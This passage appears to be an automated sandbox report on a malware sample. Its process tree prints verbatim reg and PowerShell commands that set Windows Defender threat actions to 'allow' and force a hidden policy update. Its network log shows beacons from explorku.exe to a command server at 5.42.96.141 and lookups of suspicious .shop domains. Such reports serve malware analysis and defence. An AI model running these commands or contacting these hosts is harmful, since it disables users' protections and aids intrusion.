                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6112
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6080
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5712
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5372
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:916
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5800
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5184
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4004
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3872
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5696
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5496
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:440
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5372
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5164
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1588
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2916
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5312
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3644
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4540
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3036
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2300
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5792
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2780
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe it /DXFdidLDYA 385118 /S
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5188
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5356
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5644
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5428
                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:5832
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5396
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:2936
                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:6020
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:5844
                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:5228
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5316
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:5836
                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:3644
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:2556
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5288
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                      PID:4992
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:5740
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6028

                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:19 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:22 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  141.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  141.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  dnsgoogle
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.39.216
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.148.231
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  IN A
